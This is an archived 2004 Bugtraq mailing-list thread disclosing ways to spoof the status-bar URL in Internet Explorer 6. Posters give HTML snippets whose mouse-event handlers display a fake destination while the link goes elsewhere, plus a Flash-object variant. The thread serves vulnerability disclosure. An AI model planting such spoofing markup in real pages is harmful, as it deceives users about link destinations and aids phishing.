[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <b7bc1b1f041116215518cfae88@mail.gmail.com>
Date: Wed, 17 Nov 2004 05:55:07 +0000
From: GuidoZ <uberguidoz@...il.com>
To: q q <systemcracker@...il.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: New URL spoofing bug in Microsoft Internet Explorer
> <a href="http://www.google.com"
> onmousemove="window.status='http://www.msn.com';"
> onmouseout="window.status='Done.';">Visit Msn!</a>
Again, another way of "abusing a useful feature" more then an exploit.
=P Good point. (I pointed out something similar to this long ago. Read
on.)
> <a href="http://www.google.com"
> onmouseover="window.status='http://www.msn.com';"
> onmouseout="window.status='Done.';">Visit Msn!</a>
This certainly does still work, when coded correctly. Like this for example...
<a HREF="http://www.google.com/"
onMouseOver="window.status='http://www.microsoft.com/';return true"
onMouseOut="window.status='Done';return true">Visit Microsoft!</a>
I mentioned this quite awhile back actually (10-29-04). I documented
the method (as well as the original post) at the following page:
- http://www.guidoz.com/btstatusurl.html
I'm not sure if all my original emails ever made it to BT. I seem to
remember some bounced (I was out of town and didn't bother to
resubmit). A reason for this escapes me though. (One wasn't provided.)
Hopefully this will make it. =)
--
Peace. ~G
On Tue, 16 Nov 2004 16:11:05 +0000, q q <systemcracker@...il.com> wrote:
> I thought this was obvious, but having seen the amount of discussion,
> here's another URL spoofer:
>
> <a href="http://www.google.com"
> onmousemove="window.status='http://www.msn.com';"
> onmouseout="window.status='Done.';">Visit Msn!</a>
>
> note that
>
> <a href="http://www.google.com"
> onmouseover="window.status='http://www.msn.com';"
> onmouseout="window.status='Done.';">Visit Msn!</a>
>
> won't work - it seems MS have already half fixed this....
>
> (tested on MSIE 6.0, winXP)
>
> On 8 Nov 2004 23:30:55 -0000, roozbeh afrasiabi
> <roozbeh_afrasiabi@...oo.com> wrote:
> > In-Reply-To: <005401c4bd36$6fdf3800$d9ebb9d9@...computer>
> >
> > Here is another way of spoofing the status bar:
> >
> > <a> tag + <object> tag
> >
> > <!--A HREF=http://www.yahoo.com><!--OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
> >
> > codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0"
> >
> > WIDTH="300" HEIGHT="50" id="link" ALIGN="">
> >
> > <PARAM NAME=movie VALUE="link.swf"> <PARAM NAME=quality VALUE=high > <PARAM NAME=bgcolor VALUE=#FFFFFF> <PARAM NAME=menu
> >
> > VALU=FALSE>
> >
> > <EMBED src="link.swf" quality=high bgcolor=#FFFFFF WIDTH="300" HEIGHT="50" NAME="link" ALIGN=""
> >
> > TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
> >
> > </a></OBJECT></a>
> >
> > *this method of spoofing the status bar allows malicious users to hide the target url from suspecting ppl ,demo page uses flash to generate
> >
> > random urls.
> >
> > demo:
> >
> > http://www.persiax.com/pocs/statusbar/status.htm
> >
> >
>
> --
> PHP, mySQL Security and more at http://www.puremango.co.uk
>
Powered by blists - more mailing lists